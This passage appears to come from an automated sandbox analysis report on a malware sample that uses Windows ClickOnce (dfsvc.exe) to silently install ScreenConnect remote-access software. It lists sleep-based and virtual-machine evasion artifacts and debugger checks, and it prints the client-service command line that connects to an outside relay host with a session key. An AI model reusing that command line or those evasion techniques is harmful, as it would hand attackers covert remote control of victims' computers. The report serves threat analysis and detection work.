                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599389s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -599053s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598382s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -598156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597697s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597473s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597119s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -597015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596796s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596577s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596139s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595921s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595809s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595683s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595576s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595351s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -595007s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594781s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594233s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -594015s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -593906s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6180Thread sleep time: -593796s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe TID: 6952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 6876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe TID: 7136Thread sleep count: 204 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A4B9B FindFirstFileExA,0_2_003A4B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\
                  Source: Amcache.hve.4.drBinary or memory string: VMware
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.1775663963.000001BCBCC68000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1783154349.000001BCC0C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1331266287.000000001AE64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A1920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A37C7 mov eax, dword ptr fs:[00000030h]0_2_003A37C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A69E3 GetProcessHeap,0_2_003A69E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003A1493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A46C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003A46C3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\dgxvv1kr.nbq\a4e9zaca.q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\screenconnect.clientservice.exe" "?e=support&y=guest&h=miledin.mwhelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqc1bc7fdvjjfmjkdeqwcij3jjneml4x59nf7ggtnmjpuazxqdcf4oxznuaf7%2bpvugux9iql0n%2fv66hq12w0ziemc6tfje3cmndeozodx53g06q8buhtzh2x%2f%2b%2bqrazh38rwy8beaezwgd3uplgjgt802v5ryoiginnpsg2qeyjy4zp%2b13derrkttsv6uqi5ikxqwvcrjc%2fgnpsbkuxd%2f8jpqy4dtsbrmb9x3urpot2zflzmjv0lf10mnynoj1gz6q1%2bfaqncjp2sqix%2flzxsofe0atfkdojc3uhmzdhfuwsymenjpldauviud8llhjxaaew8kihkbgfg7ine6vysqaj&r=&i=" "1"
                  Source: dfsvc.exe, 00000001.00000002.1781391219.000001BCBEA84000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.drBinary or memory string: Progman
                  Source: dfsvc.exe, 00000001.00000002.1781391219.000001BCBEA84000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsFileManager.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.Core.dll VolumeInformation
